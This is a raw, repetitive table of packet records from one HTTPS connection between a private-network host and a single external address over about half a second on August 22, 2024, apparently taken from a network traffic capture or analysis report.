Aug 22, 2024 16:13:38.798655033 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.804609060 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.804786921 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.804786921 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.804800987 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.805001020 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.807626009 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.807802916 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.807802916 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.807820082 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.808016062 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.814434052 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.814759970 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.814759970 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.814770937 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.815763950 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.819993973 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.820127010 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.820178032 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.826189041 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.826443911 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.826455116 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.826608896 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.829739094 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.829902887 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.830068111 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.832412004 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.832541943 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.835138083 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.835376024 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.838031054 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.838253975 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.846095085 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.846493006 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.846501112 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.846704006 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.856147051 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.856293917 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.856340885 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.856342077 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.856353998 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.856508017 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.858452082 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.858659029 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.864509106 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.864989042 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.867671013 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.867889881 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.873033047 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.873207092 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.873434067 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.873440981 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.873636007 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.877686977 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.877847910 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.877895117 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.877907038 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.878109932 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.883769035 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.883927107 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.884020090 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.884025097 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.884164095 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.889733076 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.889859915 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.889859915 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.889908075 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.894428968 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.894617081 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.899904013 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.900065899 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.900065899 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.906750917 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.907130003 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.908714056 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.908946991 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.914716959 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.914885044 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.915050983 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.915060043 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.915198088 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.919275999 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.919447899 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.919661999 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.919671059 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.919809103 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.925384998 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.925556898 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.925776005 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.925782919 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.925992966 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.928344011 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.928509951 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.928509951 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.932770014 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.932991982 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.937803984 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.937972069 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.937972069 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.942461967 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.942627907 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.942676067 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.942684889 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.942842007 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.948554039 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.948698997 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.948746920 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.948746920 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.948760033 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.948914051 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.953860998 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.954210043 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.956794977 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.957026958 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.959748030 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.959891081 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.959939957 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.959939957 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.959954977 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.960154057 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.965898037 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.966093063 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.966104984 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.966306925 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.971309900 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.971513033 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.977089882 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.977273941 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.977324963 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.977333069 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.977490902 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.982906103 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.983266115 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.983273983 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.983412981 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.985727072 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.985943079 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.992413998 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.992548943 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.997458935 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.997656107 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.997663975 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.997953892 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.002449989 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.002612114 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.002612114 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.002657890 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.003985882 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.004194975 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.006586075 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.006731033 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.006778955 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.012603045 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.012959957 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.013952971 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.014179945 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.020064116 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.020240068 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.020247936 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.020571947 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.026259899 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.026417971 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.026417971 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.026585102 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.026592016 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.026751041 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.036062002 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.036220074 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.036314011 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.036314011 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.036322117 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.036571026 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.040596962 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.040818930 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.043309927 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.043471098 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.046144962 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.046293020 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.046339035 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.051141024 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.051493883 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.051493883 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.052741051 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.052963018 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.055640936 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.055820942 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.059065104 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.059222937 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.063457012 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.063615084 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.063781977 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.063791037 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.063992977 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.070841074 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.071017981 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.071069002 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.071079016 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.071234941 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.077229977 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.077400923 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.077478886 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.077491045 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.077644110 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.081593990 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.081757069 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.081757069 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.087099075 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.087241888 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.087346077 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.087354898 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.087511063 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.093643904 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.093846083 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.093858004 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.094058990 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.098689079 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.098851919 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.098851919 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.098866940 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.099065065 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.104160070 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.104336977 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.106859922 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.106988907 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.109682083 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.109822989 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.109822989 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.109869957 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.109874964 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.110038042 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.115096092 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.115283966 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.120618105 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.120775938 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.120872021 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.120877028 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.121011972 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.126025915 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.126255035 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.126265049 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.126420021 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.131081104 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.131287098 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.131298065 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.131500006 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.137104034 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.137279034 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.140115023 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.140283108 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.142738104 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.142920971 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.142927885 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.143152952 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.148696899 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.148874044 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.153361082 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.153559923 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.153568029 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.153726101 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.159343004 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.159718037 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.159718037 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.162452936 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.162605047 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.172230959 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.172378063 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.172415972 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.172421932 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.172580004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.176661015 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.176831961 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.176985025 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.176990032 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.177189112 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.182472944 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.182636976 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.182636976 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.182646036 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.182817936 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.187500954 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.187659025 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.187659025 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.187757015 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.192902088 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.193075895 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.193083048 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.193289995 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.195514917 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.195636988 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.195636988 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.195684910 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.198131084 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.198328018 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.203435898 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.203605890 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.203682899 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.203691006 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.203850031 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.210473061 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.210639000 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.210686922 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.210694075 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.210854053 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.214755058 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.214929104 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.214977026 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.214983940 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.215142965 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.219736099 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.219893932 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.219893932 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.219893932 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.224936008 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.225121021 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.225130081 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.225336075 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.229984999 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.230159044 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.230159044 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.230168104 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.230374098 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.234819889 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.234987974 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.235035896 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.235042095 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.235251904 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.240447998 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.240778923 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.240778923 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.243247986 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.243386030 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:39.246002913 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:39.246195078 CEST	49794	443	192.168.11.20	74.120.9.25
